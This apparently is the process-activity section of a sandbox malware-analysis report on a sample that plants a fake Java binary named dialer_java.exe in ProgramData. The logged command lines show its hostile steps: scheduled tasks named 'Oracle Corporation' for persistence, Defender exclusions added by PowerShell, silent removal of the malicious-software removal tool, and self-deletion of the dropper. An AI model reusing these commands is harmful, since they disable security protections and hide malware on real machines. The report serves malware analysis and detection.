Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"
Imagebase:	0x7ff702490000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\Windows\System32\choice.exe
Wow64 process (32bit):	false
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x7ff787eb0000
File size:	35'840 bytes
MD5 hash:	1A9804F0C374283B094E9E55DC5EE128
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff6e3a60000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:38:23
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff6e3a60000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:38:23
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:38:23
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:38:26
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff702490000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7620, Parent PID: 7612

General

Target ID:	21
Start time:	11:38:26
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:38:26
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:38:26
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:38:26
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff765a80000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:38:26
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	11:38:28
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:38:28
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:38:31
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:38:31
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	11:38:31
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	11:38:31
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	11:38:31
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff75b4a0000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	11:38:31
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5344, Parent PID: 2836

General

Target ID:	37
Start time:	11:38:32
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	11:38:32
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5576, Parent PID: 7192

General

Target ID:	39
Start time:	11:38:32
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	11:38:35
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff702490000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	11:38:35
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	11:38:35
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	11:38:35
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	11:38:35
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff765a80000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	11:38:35
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	11:38:35
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	11:38:35
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	11:38:35
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	11:38:35
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff6ecff0000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	11:38:35
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7500, Parent PID: 7580

General

Target ID:	51
Start time:	11:38:35
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	11:38:36
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7632, Parent PID: 4324

General

Target ID:	53
Start time:	11:38:36
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	11:38:38
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	11:38:38
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff702490000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2104, Parent PID: 2028

General

Target ID:	56
Start time:	11:38:38
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	11:38:39
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	11:38:39
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	11:38:39
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff765a80000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	11:38:39
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	11:38:39
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	11:38:39
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	11:38:39
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1780, Parent PID: 7944

General

Target ID:	64
Start time:	11:38:39
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	11:38:41
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	11:38:41
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	11:38:41
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	11:38:41
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	11:38:41
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff71bd50000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	11:38:41
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8164, Parent PID: 8168

General

Target ID:	71
Start time:	11:38:41
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	11:38:41
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7196, Parent PID: 6696

General

Target ID:	73
Start time:	11:38:41
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

